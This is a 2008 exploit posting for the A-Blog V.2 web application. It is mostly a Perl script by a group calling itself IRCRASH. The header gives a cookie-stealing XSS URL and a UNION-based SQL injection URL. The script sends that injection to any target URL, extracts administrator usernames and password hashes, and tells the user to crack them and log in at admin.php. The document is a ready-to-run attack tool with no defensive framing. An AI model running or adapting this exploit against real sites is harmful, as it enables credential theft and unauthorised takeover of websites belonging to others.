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Posted on 05 February 2008

#!/usr/bin/perl ##################################################################################### #### A-Blog V.2 #### #### Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS) #### ##################################################################################### # # #AUTHOR : IRCRASH # #Discovered by : Dr.Crash # #Exploited By : Dr.Crash # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm # # # ##################################################################################### # # #Script Download : http://heanet.dl.sourceforge.net/sourceforge/a-blog/A-BlogV2.rar # # # ##################################################################################### # < XSS > # #XSS Address : http://Sitename/search.php?words=<script>alert(document.cookie);</script>&submit=Go # # ##################################################################################### # < SQL > # #SQL Address : http://Sitename/blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/* # Help : See Username And Password In Site Title # # ##################################################################################### # Our site : Http://IRCRASH.COM # ##################################################################################### use LWP; use HTTP::Request; use Getopt::Long; sub header { print " **************************************************** * A-Blog V.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : Dr.Crash * *Exploited by : Dr.Crash * *Our Site : IRCRASH.COM * ****************************************************"; } sub usage { print " * Usage : perl $0 -url http://Sitename/ **************************************************** "; } my %parameter = (); GetOptions(\%parameter, "url=s"); $url = $parameter{"url"}; if(!$url) { header(); usage(); exit; } if($url !~ ///){$url = $url."/";} if($url !~ /http:///){$url = "http://".$url;} $vul = "blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*"; sub Exploit() { $requestpage = $url.$vul; print "Requesting Page is ".$url." "; my $req = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/' ); $req->referer($url); $req->referer("http://IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/<endpass>/,$password); $password = @password[0]; if(!$name && !$password) { print " "; print "!Exploit failed ! :( "; exit; } print "Username: ".$name." "; print "Password: " .$password." "; print "Crack Password And Login In : $url/admin.php "; print "Enjoy My friend ..... "; } #Starting; print " **************************************************** * A-Blog V.2 Sql Injection exploit * **************************************************** *AUTHOR : IRCRASH * *Discovered by : Dr.Crash * *Exploited by : Dr.Crash * *Our Site : IRCRASH.COM * ****************************************************"; print " Exploiting... "; Exploit();